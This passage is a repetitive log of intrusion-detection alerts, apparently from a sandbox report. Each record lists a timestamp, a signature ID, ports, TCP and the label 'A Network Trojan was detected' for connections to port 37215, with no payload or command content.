          Timestamp:06/08/24-15:05:24.257189
          SID:2835222
          Source Port:60624
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.015029
          SID:2835222
          Source Port:53692
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.043643
          SID:2829579
          Source Port:49444
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.745603
          SID:2835222
          Source Port:42880
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.467500
          SID:2829579
          Source Port:46642
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.466797
          SID:2829579
          Source Port:48934
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.859419
          SID:2829579
          Source Port:52918
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.175807
          SID:2835222
          Source Port:44324
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.670047
          SID:2835222
          Source Port:35868
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.513964
          SID:2829579
          Source Port:44862
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.043078
          SID:2835222
          Source Port:38340
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.404978
          SID:2835222
          Source Port:56914
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.446197
          SID:2835222
          Source Port:56298
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.782120
          SID:2829579
          Source Port:58856
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.671490
          SID:2835222
          Source Port:55886
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.890521
          SID:2829579
          Source Port:46274
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.127472
          SID:2835222
          Source Port:50830
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.463458
          SID:2835222
          Source Port:51900
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.804320
          SID:2835222
          Source Port:48776
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.449246
          SID:2829579
          Source Port:41208
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.466234
          SID:2835222
          Source Port:42888
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.404600
          SID:2829579
          Source Port:50626
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.747501
          SID:2835222
          Source Port:41284
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.731623
          SID:2835222
          Source Port:51300
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.791957
          SID:2835222
          Source Port:42038
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.675101
          SID:2835222
          Source Port:35684
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.162731
          SID:2829579
          Source Port:53756
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.107436
          SID:2835222
          Source Port:35642
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.354125
          SID:2829579
          Source Port:54112
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.740846
          SID:2829579
          Source Port:47874
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.410860
          SID:2829579
          Source Port:41898
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.159742
          SID:2829579
          Source Port:33732
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.731945
          SID:2829579
          Source Port:44718
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.786321
          SID:2835222
          Source Port:57164
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.911845
          SID:2835222
          Source Port:36636
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.107437
          SID:2829579
          Source Port:44904
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.846628
          SID:2829579
          Source Port:49074
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.025976
          SID:2829579
          Source Port:34382
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.782884
          SID:2829579
          Source Port:46804
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.551494
          SID:2829579
          Source Port:40282
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.827839
          SID:2835222
          Source Port:39168
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.271581
          SID:2829579
          Source Port:43524
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.542882
          SID:2835222
          Source Port:55822
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.495573
          SID:2829579
          Source Port:48428
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.672955
          SID:2829579
          Source Port:55844
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.670642
          SID:2835222
          Source Port:51406
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.353749
          SID:2829579
          Source Port:37220
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.663815
          SID:2829579
          Source Port:56170
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.036187
          SID:2829579
          Source Port:37622
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.842333
          SID:2829579
          Source Port:33088
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.738416
          SID:2829579
          Source Port:36780
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.110180
          SID:2829579
          Source Port:46126
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.180561
          SID:2829579
          Source Port:46126
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.067368
          SID:2829579
          Source Port:41000
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.741724
          SID:2829579
          Source Port:53840
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.730402
          SID:2829579
          Source Port:46290
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.668121
          SID:2829579
          Source Port:60648
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.598715
          SID:2829579
          Source Port:43010
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.781333
          SID:2835222
          Source Port:37536
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.797840
          SID:2835222
          Source Port:33312
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.463446
          SID:2835222
          Source Port:49800
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.159116
          SID:2835222
          Source Port:35148
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.176068
          SID:2829579
          Source Port:44314
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.456540
          SID:2835222
          Source Port:41056
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.675189
          SID:2829579
          Source Port:36268
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.266450
          SID:2835222
          Source Port:57322
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.352698
          SID:2829579
          Source Port:36904
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.895172
          SID:2829579
          Source Port:48194
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.108910
          SID:2829579
          Source Port:34388
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.601242
          SID:2829579
          Source Port:47910
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.107601
          SID:2835222
          Source Port:45408
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.465846
          SID:2835222
          Source Port:50992
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.890606
          SID:2829579
          Source Port:52710
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.274687
          SID:2835222
          Source Port:57696
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.352973
          SID:2829579
          Source Port:45618
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.169634
          SID:2829579
          Source Port:45570
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.159323
          SID:2829579
          Source Port:60248
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.306451
          SID:2829579
          Source Port:56520
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.517957
          SID:2835222
          Source Port:47440
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.787994
          SID:2829579
          Source Port:55408
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.403165
          SID:2835222
          Source Port:56512
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.799599
          SID:2829579
          Source Port:41132
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.730952
          SID:2835222
          Source Port:59260
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.264087
          SID:2835222
          Source Port:49174
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.842828
          SID:2829579
          Source Port:55742
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.237428
          SID:2835222
          Source Port:55282
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.178644
          SID:2835222
          Source Port:35988
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.352509
          SID:2829579
          Source Port:39382
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.178145
          SID:2829579
          Source Port:50192
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.044119
          SID:2835222
          Source Port:60984
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.155579
          SID:2829579
          Source Port:37008
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.548190
          SID:2835222
          Source Port:60702
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.176404
          SID:2835222
          Source Port:47698
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.356933
          SID:2835222
          Source Port:57134
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.912407
          SID:2829579
          Source Port:51548
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.395191
          SID:2835222
          Source Port:33080
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.410173
          SID:2835222
          Source Port:51676
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.113529
          SID:2835222
          Source Port:41496
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.792180
          SID:2829579
          Source Port:54334
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.514009
          SID:2829579
          Source Port:55978
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.461227
          SID:2835222
          Source Port:43348
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.262604
          SID:2835222
          Source Port:55828
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.707511
          SID:2835222
          Source Port:42742
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.068143
          SID:2835222
          Source Port:55322
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.732163
          SID:2829579
          Source Port:39660
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.780605
          SID:2829579
          Source Port:50160
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.111940
          SID:2829579
          Source Port:43578
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.740881
          SID:2835222
          Source Port:58404
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.274244
          SID:2829579
          Source Port:57696
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.545411
          SID:2835222
          Source Port:41136
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.352655
          SID:2829579
          Source Port:40678
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.355954
          SID:2835222
          Source Port:33976
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.242398
          SID:2829579
          Source Port:55922
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.733278
          SID:2829579
          Source Port:56190
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.405120
          SID:2829579
          Source Port:56516
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.787790
          SID:2829579
          Source Port:58970
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.233413
          SID:2829579
          Source Port:48190
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.188878
          SID:2835222
          Source Port:42600
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.242236
          SID:2829579
          Source Port:54666
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.356471
          SID:2835222
          Source Port:51352
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.462428
          SID:2829579
          Source Port:36124
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.177613
          SID:2829579
          Source Port:35868
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.258684
          SID:2829579
          Source Port:50478
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.403214
          SID:2835222
          Source Port:37690
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.811724
          SID:2835222
          Source Port:36492
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.258061
          SID:2835222
          Source Port:53476
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.449950
          SID:2835222
          Source Port:53798
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.509030
          SID:2835222
          Source Port:44662
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.405339
          SID:2829579
          Source Port:55834
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.881228
          SID:2829579
          Source Port:33304
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.784345
          SID:2829579
          Source Port:54882
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.126902
          SID:2829579
          Source Port:56200
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.738041
          SID:2835222
          Source Port:34154
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.158169
          SID:2829579
          Source Port:53198
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.463172
          SID:2835222
          Source Port:40440
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.262532
          SID:2829579
          Source Port:49556
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.471034
          SID:2829579
          Source Port:38488
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.460261
          SID:2835222
          Source Port:36014
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.884305
          SID:2829579
          Source Port:47240
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.448632
          SID:2835222
          Source Port:57530
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.353706
          SID:2835222
          Source Port:33986
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.782559
          SID:2835222
          Source Port:47644
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.735067
          SID:2829579
          Source Port:48126
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.542786
          SID:2829579
          Source Port:49026
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.671858
          SID:2829579
          Source Port:50956
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.109284
          SID:2835222
          Source Port:51126
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.127993
          SID:2829579
          Source Port:60050
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.471100
          SID:2829579
          Source Port:44028
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.517083
          SID:2829579
          Source Port:54876
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.395110
          SID:2835222
          Source Port:41928
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.461183
          SID:2829579
          Source Port:50732
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.707196
          SID:2829579
          Source Port:59362
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.465779
          SID:2829579
          Source Port:38612
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.462798
          SID:2835222
          Source Port:40498
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.847108
          SID:2835222
          Source Port:55182
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.896028
          SID:2829579
          Source Port:49260
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.787026
          SID:2835222
          Source Port:45126
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.897270
          SID:2835222
          Source Port:34452
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.112014
          SID:2835222
          Source Port:37280
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.442317
          SID:2829579
          Source Port:34036
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.449580
          SID:2829579
          Source Port:38410
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.160891
          SID:2829579
          Source Port:53080
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.822445
          SID:2829579
          Source Port:36940
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.352530
          SID:2829579
          Source Port:52062
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.356324
          SID:2829579
          Source Port:47052
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.912769
          SID:2835222
          Source Port:55058
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.468766
          SID:2835222
          Source Port:47018
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.793516
          SID:2829579
          Source Port:40678
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.742098
          SID:2835222
          Source Port:40904
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.546853
          SID:2835222
          Source Port:55074
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.858240
          SID:2835222
          Source Port:37660
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.106173
          SID:2835222
          Source Port:40964
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.807563
          SID:2835222
          Source Port:48720
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.262391
          SID:2835222
          Source Port:42808
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.731475
          SID:2835222
          Source Port:55094
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.667118
          SID:2829579
          Source Port:40556
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.812649
          SID:2829579
          Source Port:37490
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.842119
          SID:2829579
          Source Port:36548
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.021133
          SID:2829579
          Source Port:58888
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.237243
          SID:2829579
          Source Port:55966
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.508859
          SID:2829579
          Source Port:52424
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.460314
          SID:2835222
          Source Port:46418
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.108233
          SID:2835222
          Source Port:43050
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.057823
          SID:2829579
          Source Port:46994
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.058199
          SID:2829579
          Source Port:60474
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.704296
          SID:2835222
          Source Port:54844
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.511624
          SID:2829579
          Source Port:49916
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.495989
          SID:2835222
          Source Port:49588
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.352624
          SID:2829579
          Source Port:60194
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.674197
          SID:2829579
          Source Port:54176
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.602656
          SID:2835222
          Source Port:56754
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.738444
          SID:2829579
          Source Port:32854
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.446418
          SID:2829579
          Source Port:40924
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.015731
          SID:2829579
          Source Port:43390
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.241566
          SID:2835222
          Source Port:54382
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.356070
          SID:2835222
          Source Port:34970
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.081807
          SID:2829579
          Source Port:38408
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.159669
